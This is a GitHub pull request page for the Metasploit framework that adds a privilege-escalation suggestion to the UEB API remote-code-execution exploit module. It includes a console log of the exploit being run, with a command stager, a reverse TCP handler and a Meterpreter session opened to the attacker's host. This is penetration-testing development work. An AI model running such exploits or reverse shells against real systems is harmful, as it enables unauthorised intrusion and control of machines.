New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ueb priv esc suggestion #11223

Merged
merged 1 commit into from Jan 10, 2019

Conversation

Projects
None yet
3 participants
@h00die
Copy link
Contributor

h00die commented Jan 10, 2019

This PR adds a LPE suggestion to the UEB module.
Suggestion from: #10952 (comment)
Using the text from: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb#L258

Example run:

msf5 > use exploit/linux/http/ueb_api_rce 
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (914728 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:38760) at 2019-01-09 20:27:06 -0500
[+] A privilege escalation exploit can be found 'exploits/linux/local/ueb_bpserverd_privesc'
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > exit

Notice the new suggestion at the end!

@h00die h00die added the easy label Jan 10, 2019

@bcoles

bcoles approved these changes Jan 10, 2019

@wchen-r7 wchen-r7 merged commit 74330f8 into rapid7:master Jan 10, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

msjenkins-r7 added a commit that referenced this pull request Jan 10, 2019

Land #11223 - ueb priv esc suggestion
ueb priv esc suggestion.

@h00die h00die deleted the h00die:ueb_recommend branch Jan 14, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment